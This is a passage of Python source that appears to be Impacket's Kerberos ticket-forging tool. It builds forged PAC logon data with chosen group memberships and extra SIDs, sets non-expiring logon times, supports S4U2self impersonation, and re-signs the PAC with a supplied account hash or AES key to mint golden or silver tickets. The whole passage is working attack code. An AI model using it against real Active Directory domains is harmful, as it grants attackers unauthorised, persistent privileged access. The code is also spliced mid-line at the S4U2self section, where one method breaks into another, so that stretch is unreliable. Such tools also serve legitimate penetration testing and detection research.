recipient of the PAC SHOULD<7> use this value as\n # an indicator of when to warn the user that the allowed time is due to expire.\n kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF\n\n # KickOffTime: A FILETIME structure that contains LogoffTime minus the user\n # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the\n # client should not be logged off, this structure SHOULD have the dwHighDateTime\n # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF.\n # The Kerberos service ticket end time is a replacement for KickOffTime.\n # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of\n # an account. A recipient of the PAC SHOULD<8> use this value as the indicator\n # of when the client should be forcibly disconnected.\n kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF\n\n kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff\n kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32\n\n kerbdata['PasswordCanChange']['dwLowDateTime'] = 0\n kerbdata['PasswordCanChange']['dwHighDateTime'] = 0\n\n # PasswordMustChange: A FILETIME structure that contains the time at which\n # theclient's password expires. If the password will not expire, this\n # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the\n # dwLowDateTime member set to 0xFFFFFFFF.\n kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF\n\n kerbdata['EffectiveName'] = self.__target\n kerbdata['FullName'] = ''\n kerbdata['LogonScript'] = ''\n kerbdata['ProfilePath'] = ''\n kerbdata['HomeDirectory'] = ''\n kerbdata['HomeDirectoryDrive'] = ''\n kerbdata['LogonCount'] = 500\n kerbdata['BadPasswordCount'] = 0\n kerbdata['UserId'] = int(self.__options.user_id)\n\n # Our Golden Well-known groups! :)\n groups = self.__options.groups.split(',')\n if len(groups) == 0:\n # PrimaryGroupId must be set, default to 513 (Domain User)\n kerbdata['PrimaryGroupId'] = 513\n else:\n # Using first group as primary group\n kerbdata['PrimaryGroupId'] = int(groups[0])\n kerbdata['GroupCount'] = len(groups)\n\n for group in groups:\n groupMembership = GROUP_MEMBERSHIP()\n groupId = NDRULONG()\n groupId['Data'] = int(group)\n groupMembership['RelativeId'] = groupId\n groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n kerbdata['GroupIds'].append(groupMembership)\n\n kerbdata['UserFlags'] = 0\n kerbdata['UserSessionKey'] = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n kerbdata['LogonServer'] = ''\n kerbdata['LogonDomainName'] = self.__domain.upper()\n kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid)\n kerbdata['LMKey'] = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD\n kerbdata['SubAuthStatus'] = 0\n kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0\n kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0\n kerbdata['LastFailedILogon']['dwLowDateTime'] = 0\n kerbdata['LastFailedILogon']['dwHighDateTime'] = 0\n kerbdata['FailedILogonCount'] = 0\n kerbdata['Reserved3'] = 0\n\n kerbdata['ResourceGroupDomainSid'] = NULL\n kerbdata['ResourceGroupCount'] = 0\n kerbdata['ResourceGroupIds'] = NULL\n\n validationInfo = VALIDATION_INFO()\n validationInfo['Data'] = kerbdata\n\n return validationInfo\n\n def createBasicPac(self, kdcRep):\n validationInfo = self.createBasicValidationInfo()\n pacInfos = {}\n pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents()\n srvCheckSum = PAC_SIGNATURE_DATA()\n privCheckSum = PAC_SIGNATURE_DATA()\n\n if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value:\n srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value\n privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value\n srvCheckSum['Signature'] = b'\\x00' * 16\n privCheckSum['Signature'] = b'\\x00' * 16\n else:\n srvCheckSum['Signature'] = b'\\x00' * 12\n privCheckSum['Signature'] = b'\\x00' * 12\n if len(self.__options.aesKey) == 64:\n srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value\n privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value\n else:\n srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value\n privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value\n\n pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData()\n pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData()\n\n clientInfo = PAC_CLIENT_INFO()\n clientInfo['Name'] = self.__target.encode('utf-16le')\n clientInfo['NameLength'] = len(clientInfo['Name'])\n pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()\n\n if self.__options.extra_pac:\n self.createUpnDnsPac(pacInfos)\n\n if self.__options.old_pac is False:\n self.createAttributesInfoPac(pacInfos)\n self.createRequestorInfoPac(pacInfos)\n\n return pacInfos\n\n def createUpnDnsPac(self, pacInfos):\n upnDnsInfo = UPN_DNS_INFO_FULL()\n\n PAC_pad = b'\\x00' * self.getPadLength(len(upnDnsInfo))\n upn_data = f\"{self.__target.lower()}@{self.__domain.lower()}\".encode(\"utf-16-le\")\n upnDnsInfo['UpnLength'] = len(upn_data)\n upnDnsInfo['UpnOffset'] = len(upnDnsInfo) + len(PAC_pad)\n total_len = upnDnsInfo['UpnOffset'] + upnDnsInfo['UpnLength']\n pad = self.getPadLength(total_len)\n upn_data += b'\\x00' * pad\n\n dns_name = self.__domain.upper().encode(\"utf-16-le\")\n upnDnsInfo['DnsDomainNameLength'] = len(dns_name)\n upnDnsInfo['DnsDomainNameOffset'] = total_len + pad\n total_len = upnDnsInfo['DnsDomainNameOffset'] + upnDnsInfo['DnsDomainNameLength']\n pad = self.getPadLength(total_len)\n dns_name += b'\\x00' * pad\n\n # Enable additional data mode (Sam + SID)\n upnDnsInfo['Flags'] = 2\n\n samName = self.__target.encode(\"utf-16-le\")\n upnDnsInfo['SamNameLength'] = len(samName)\n upnDnsInfo['SamNameOffset'] = total_len + pad\n total_len = upnDnsInfo['SamNameOffset'] + upnDnsInfo['SamNameLength']\n pad = self.getPadLength(total_len)\n samName += b'\\x00' * pad\n\n user_sid = SID()\n user_sid.fromCanonical(f\"{self.__options.domain_sid}-{self.__options.user_id}\")\n upnDnsInfo['SidLength'] = len(user_sid)\n upnDnsInfo['SidOffset'] = total_len + pad\n total_len = upnDnsInfo['SidOffset'] + upnDnsInfo['SidLength']\n pad = self.getPadLength(total_len)\n user_data = user_sid.getData() + b'\\x00' * pad\n\n # Post-PAC data\n post_pac_data = upn_data + dns_name + samName + user_data\n # Pac data building\n pacInfos[PAC_UPN_DNS_INFO] = upnDnsInfo.getData() + PAC_pad + post_pac_data\n\n @staticmethod\n def createAttributesInfoPac(pacInfos):\n pacAttributes = PAC_ATTRIBUTE_INFO()\n pacAttributes[\"FlagsLength\"] = 2\n pacAttributes[\"Flags\"] = 1\n\n pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()\n\n def createRequestorInfoPac(self, pacInfos):\n pacRequestor = PAC_REQUESTOR()\n pacRequestor['UserSid'] = SID()\n pacRequestor['UserSid'].fromCanonical(f\"{self.__options.domain_sid}-{self.__options.user_id}\")\n\n pacInfos[PAC_REQUESTOR_INFO] = pacRequestor.getData()\n\n def createBasicTicket(self):\n if self.__options.request is True:\n if self.__domain == self.__server:\n logging.info('Requesting TGT to target domain to use as basis')\n else:\n logging.info('Requesting TGT/TGS to target domain to use as basis')\n\n if self.__options.hashes is not None:\n lmhash, nthash = self.__options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value)\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(lmhash), unhexlify(nthash), None,\n self.__options.dc_ip)\n self.__tgt, self.__tgt_cipher, self.__tgt_session_key = tgt, cipher, sessionKey\n if self.__domain == self.__server:\n kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]\n else:\n serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher,\n sessionKey)\n kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]\n\n # Let's check we have all the necessary data based on the ciphers used. Boring checks\n ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])\n encPartCipher = int(kdcRep['enc-part']['etype'])\n\n if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \\\n self.__options.nthash is None:\n logging.critical('rc4_hmac is used in this ticket and you haven\\'t specified the -nthash parameter. '\n 'Can\\'t continue ( or try running again w/o the -request option)')\n return None, None\n\n if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or\n encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \\\n self.__options.aesKey is None:\n logging.critical(\n 'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\\'t specified the -aesKey parameter. '\n 'Can\\'t continue (or try running again w/o the -request option)')\n return None, None\n\n if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or\n encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \\\n self.__options.aesKey is not None and len(self.__options.aesKey) > 32:\n logging.critical(\n 'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. '\n 'Can\\'t continue (or try running again w/o the -request option)')\n return None, None\n\n if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or\n encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None:\n logging.critical(\n 'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\\'t specified the -aesKey parameter. '\n 'Can\\'t continue (or try running again w/o the -request option)')\n return None, None\n\n if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or\n encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \\\n self.__options.aesKey is not None and len(self.__options.aesKey) < 64:\n logging.critical(\n 'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. '\n 'Can\\'t continue')\n return None, None\n kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value\n kdcRep['cname']['name-string'] = noValue\n kdcRep['cname']['name-string'][0] = self.__options.impersonate or self.__target\n\n else:\n logging.info('Creating basic skeleton ticket and PAC Infos')\n if self.__domain == self.__server:\n kdcRep = AS_REP()\n kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value\n else:\n kdcRep = TGS_REP()\n kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value\n kdcRep['pvno'] = 5\n if self.__options.nthash is None:\n kdcRep['padata'] = noValue\n kdcRep['padata'][0] = noValue\n kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value\n\n etype2 = ETYPE_INFO2()\n etype2[0] = noValue\n if len(self.__options.aesKey) == 64:\n etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value\n else:\n etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value\n etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target)\n encodedEtype2 = encoder.encode(etype2)\n\n kdcRep['padata'][0]['padata-value'] = encodedEtype2\n\n kdcRep['crealm'] = self.__domain.upper()\n kdcRep['cname'] = noValue\n kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value\n kdcRep['cname']['name-string'] = noValue\n kdcRep['cname']['name-string'][0] = self.__target\n\n kdcRep['ticket'] = noValue\n kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value\n kdcRep['ticket']['realm'] = self.__domain.upper()\n kdcRep['ticket']['sname'] = noValue\n kdcRep['ticket']['sname']['name-string'] = noValue\n kdcRep['ticket']['sname']['name-string'][0] = self.__service\n\n if self.__domain == self.__server:\n kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value\n kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper()\n else:\n kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value\n kdcRep['ticket']['sname']['name-string'][1] = self.__server\n\n kdcRep['ticket']['enc-part'] = noValue\n kdcRep['ticket']['enc-part']['kvno'] = 2\n kdcRep['enc-part'] = noValue\n if self.__options.nthash is None:\n if len(self.__options.aesKey) == 64:\n kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value\n kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value\n else:\n kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value\n kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value\n else:\n kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value\n kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value\n\n kdcRep['enc-part']['kvno'] = 2\n kdcRep['enc-part']['cipher'] = noValue\n\n pacInfos = self.createBasicPac(kdcRep)\n\n return kdcRep, pacInfos\n\n\n def getKerberosS4U2SelfU2U(self):\n tgt = self.__tgt\n cipher = self.__tgt_cipher\n sessionKey = self.__tgt_session_key\n kdcHost = self.__options.dc_ip\n\n decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]\n # Extract the ticket from the TGT\n ticket = Ticket()\n ticket.from_asn1(decodedTGT['ticket'])\n\n apReq = AP_REQ()\n apReq['pvno'] = 5\n apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)\n\n opts = list()\n apReq['ap-options'] = constants.encodeFlags(opts)\n seq_set(apReq, 'ticket', ticket.to_asn1)\n\n authenticator = Authenticator()\n authenticator['authenticator-vno'] = 5\n authenticator['crealm'] = str(decodedTGT['crealm'])\n\n clientName = Principal()\n clientName.from_asn1(decodedTGT, 'crealm', 'cname')\n\n seq_set(authenticator, 'cname', clientName.components_to_asn1)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n authenticator['cusec'] = now.microsecond\n authenticator['ctime'] = KerberosTime.to_asn1(now)\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('AUTHENTICATOR')\n print(authenticator.prettyPrint())\n print('\\n')\n\n encodedAuthenticator = encoder.encode(authenticator)\n\n # Key Usage 7\n # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes\n # TGS authenticator subkey), encrypted with the TGS session\n # key (Section 5.5.1)\n encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)\n\n apReq['authenticator'] = noValue\n apReq['authenticator']['etype'] = cipher.enctype\n apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator\n\n encodedApReq = encoder.encode(apReq)\n\n tgsReq = TGS_REQ()\n\n tgsReq['pvno'] = 5\n tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)\n\n tgsReq['padata'] = noValue\n tgsReq['padata'][0] = noValue\n tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)\n tgsReq['padata'][0]['padata-value'] = encodedApReq\n\n # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service\n # requests a service ticket to itself on behalf of a user. The user is\n # identified to the KDC by the user's name and realm.\n clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n S4UByteArray = struct.pack('> 32\n\n # Let's adjust username and other data\n validationInfo['Data']['LogonDomainName'] = self.__domain.upper()\n validationInfo['Data']['EffectiveName'] = self.__target\n # Our Golden Well-known groups! :)\n groups = self.__options.groups.split(',')\n validationInfo['Data']['GroupIds'] = list()\n validationInfo['Data']['GroupCount'] = len(groups)\n\n for group in groups:\n groupMembership = GROUP_MEMBERSHIP()\n groupId = NDRULONG()\n groupId['Data'] = int(group)\n groupMembership['RelativeId'] = groupId\n groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n validationInfo['Data']['GroupIds'].append(groupMembership)\n\n # Let's add the extraSid\n if self.__options.extra_sid is not None:\n extrasids = self.__options.extra_sid.split(',')\n if validationInfo['Data']['SidCount'] == 0:\n # Let's be sure user's flag specify we have extra sids.\n validationInfo['Data']['UserFlags'] |= 0x20\n validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()\n for extrasid in extrasids:\n validationInfo['Data']['SidCount'] += 1\n\n sidRecord = KERB_SID_AND_ATTRIBUTES()\n\n sid = RPC_SID()\n sid.fromCanonical(extrasid)\n\n sidRecord['Sid'] = sid\n sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n\n # And, let's append the magicSid\n validationInfo['Data']['ExtraSids'].append(sidRecord)\n else:\n validationInfo['Data']['ExtraSids'] = NULL\n\n validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents()\n pacInfos[PAC_LOGON_INFO] = validationInfoBlob\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('VALIDATION_INFO after making it gold')\n validationInfo.dump()\n print('\\n')\n else:\n raise Exception('PAC_LOGON_INFO not found! Aborting')\n\n logging.info('\\tPAC_LOGON_INFO')\n\n # Let's now clear the checksums\n if PAC_SERVER_CHECKSUM in pacInfos:\n serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])\n if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:\n serverChecksum['Signature'] = '\\x00' * 12\n elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:\n serverChecksum['Signature'] = '\\x00' * 12\n else:\n serverChecksum['Signature'] = '\\x00' * 16\n pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()\n else:\n raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')\n\n if PAC_PRIVSVR_CHECKSUM in pacInfos:\n privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])\n privSvrChecksum['Signature'] = '\\x00' * 12\n if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:\n privSvrChecksum['Signature'] = '\\x00' * 12\n elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:\n privSvrChecksum['Signature'] = '\\x00' * 12\n else:\n privSvrChecksum['Signature'] = '\\x00' * 16\n pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()\n else:\n raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')\n\n if PAC_CLIENT_INFO_TYPE in pacInfos:\n pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])\n pacClientInfo['ClientId'] = unixTime\n pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()\n else:\n raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')\n\n logging.info('\\tPAC_CLIENT_INFO_TYPE')\n logging.info('\\tEncTicketPart')\n\n if self.__domain == self.__server:\n encRepPart = EncASRepPart()\n else:\n encRepPart = EncTGSRepPart()\n\n encRepPart['key'] = noValue\n encRepPart['key']['keytype'] = encTicketPart['key']['keytype']\n encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']\n encRepPart['last-req'] = noValue\n encRepPart['last-req'][0] = noValue\n encRepPart['last-req'][0]['lr-type'] = 0\n encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.now(datetime.timezone.utc))\n encRepPart['nonce'] = 123456789\n encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)\n flags = []\n for i in encTicketPart['flags']:\n flags.append(i)\n encRepPart['flags'] = flags\n encRepPart['authtime'] = str(encTicketPart['authtime'])\n encRepPart['endtime'] = str(encTicketPart['endtime'])\n encRepPart['starttime'] = str(encTicketPart['starttime'])\n encRepPart['renew-till'] = str(encTicketPart['renew-till'])\n encRepPart['srealm'] = self.__domain.upper()\n encRepPart['sname'] = noValue\n encRepPart['sname']['name-string'] = noValue\n encRepPart['sname']['name-string'][0] = self.__service\n\n if self.__domain == self.__server:\n encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value\n encRepPart['sname']['name-string'][1] = self.__domain.upper()\n logging.info('\\tEncAsRepPart')\n else:\n encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value\n encRepPart['sname']['name-string'][1] = self.__server\n logging.info('\\tEncTGSRepPart')\n return encRepPart, encTicketPart, pacInfos\n\n def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):\n logging.info('Signing/Encrypting final ticket')\n\n # Basic PAC count\n pac_count = 4\n\n # We changed everything we needed to make us special. Now let's repack and calculate checksums\n validationInfoBlob = pacInfos[PAC_LOGON_INFO]\n validationInfoAlignment = b'\\x00' * self.getPadLength(len(validationInfoBlob))\n\n pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]\n pacClientInfoAlignment = b'\\x00' * self.getPadLength(len(pacClientInfoBlob))\n\n pacUpnDnsInfoBlob = None\n pacUpnDnsInfoAlignment = None\n if PAC_UPN_DNS_INFO in pacInfos:\n pac_count += 1\n pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]\n pacUpnDnsInfoAlignment = b'\\x00' * self.getPadLength(len(pacUpnDnsInfoBlob))\n\n pacAttributesInfoBlob = None\n pacAttributesInfoAlignment = None\n if PAC_ATTRIBUTES_INFO in pacInfos:\n pac_count += 1\n pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]\n pacAttributesInfoAlignment = b'\\x00' * self.getPadLength(len(pacAttributesInfoBlob))\n\n pacRequestorInfoBlob = None\n pacRequestorInfoAlignment = None\n if PAC_REQUESTOR_INFO in pacInfos:\n pac_count += 1\n pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]\n pacRequestorInfoAlignment = b'\\x00' * self.getPadLength(len(pacRequestorInfoBlob))\n\n serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])\n serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]\n serverChecksumAlignment = b'\\x00' * self.getPadLength(len(serverChecksumBlob))\n\n privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])\n privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]\n privSvrChecksumAlignment = b'\\x00' * self.getPadLength(len(privSvrChecksumBlob))\n\n # The offset are set from the beginning of the PAC_TYPE\n # [MS-PAC] 2.4 PAC_INFO_BUFFER\n offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * pac_count\n\n # Let's build the PAC_INFO_BUFFER for each one of the elements\n validationInfoIB = PAC_INFO_BUFFER()\n validationInfoIB['ulType'] = PAC_LOGON_INFO\n validationInfoIB['cbBufferSize'] = len(validationInfoBlob)\n validationInfoIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + validationInfoIB['cbBufferSize'])\n\n pacClientInfoIB = PAC_INFO_BUFFER()\n pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE\n pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)\n pacClientInfoIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + pacClientInfoIB['cbBufferSize'])\n\n pacUpnDnsInfoIB = None\n if pacUpnDnsInfoBlob is not None:\n pacUpnDnsInfoIB = PAC_INFO_BUFFER()\n pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO\n pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)\n pacUpnDnsInfoIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + pacUpnDnsInfoIB['cbBufferSize'])\n\n pacAttributesInfoIB = None\n if pacAttributesInfoBlob is not None:\n pacAttributesInfoIB = PAC_INFO_BUFFER()\n pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO\n pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)\n pacAttributesInfoIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + pacAttributesInfoIB['cbBufferSize'])\n\n pacRequestorInfoIB = None\n if pacRequestorInfoBlob is not None:\n pacRequestorInfoIB = PAC_INFO_BUFFER()\n pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO\n pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)\n pacRequestorInfoIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + pacRequestorInfoIB['cbBufferSize'])\n\n serverChecksumIB = PAC_INFO_BUFFER()\n serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM\n serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)\n serverChecksumIB['Offset'] = offsetData\n offsetData = self.getBlockLength(offsetData + serverChecksumIB['cbBufferSize'])\n\n privSvrChecksumIB = PAC_INFO_BUFFER()\n privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM\n privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)\n privSvrChecksumIB['Offset'] = offsetData\n # offsetData = self.getBlockLength(offsetData+privSvrChecksumIB['cbBufferSize'])\n\n # Building the PAC_TYPE as specified in [MS-PAC]\n buffers = validationInfoIB.getData() + pacClientInfoIB.getData()\n if pacUpnDnsInfoIB is not None:\n buffers += pacUpnDnsInfoIB.getData()\n if pacAttributesInfoIB is not None:\n buffers += pacAttributesInfoIB.getData()\n if pacRequestorInfoIB is not None:\n buffers += pacRequestorInfoIB.getData()\n\n buffers += serverChecksumIB.getData() + privSvrChecksumIB.getData() + validationInfoBlob + \\\n validationInfoAlignment + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment\n if pacUpnDnsInfoIB is not None:\n buffers += pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment\n if pacAttributesInfoIB is not None:\n buffers += pacAttributesInfoBlob + pacAttributesInfoAlignment\n if pacRequestorInfoIB is not None:\n buffers += pacRequestorInfoBlob + pacRequestorInfoAlignment\n\n buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment\n\n pacType = PACTYPE()\n pacType['cBuffers'] = pac_count\n pacType['Version'] = 0\n pacType['Buffers'] = buffers + buffersTail\n\n blobToChecksum = pacType.getData()\n\n checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]\n if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:\n keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))\n elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:\n keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))\n elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:\n keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))\n else:\n raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])\n\n checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]\n if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:\n keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))\n elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:\n keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))\n elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:\n keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))\n else:\n raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'])\n\n serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)\n logging.info('\\tPAC_SERVER_CHECKSUM')\n privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])\n logging.info('\\tPAC_PRIVSVR_CHECKSUM')\n\n buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment\n pacType['Buffers'] = buffers + buffersTail\n\n authorizationData = AuthorizationData()\n authorizationData[0] = noValue\n authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value\n authorizationData[0]['ad-data'] = pacType.getData()\n authorizationData = encoder.encode(authorizationData)\n\n encTicketPart['authorization-data'][0]['ad-data'] = authorizationData\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('Customized EncTicketPart')\n print(encTicketPart.prettyPrint())\n print('\\n')\n\n encodedEncTicketPart = encoder.encode(encTicketPart)\n\n cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]\n if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value:\n key = Key(cipher.enctype, 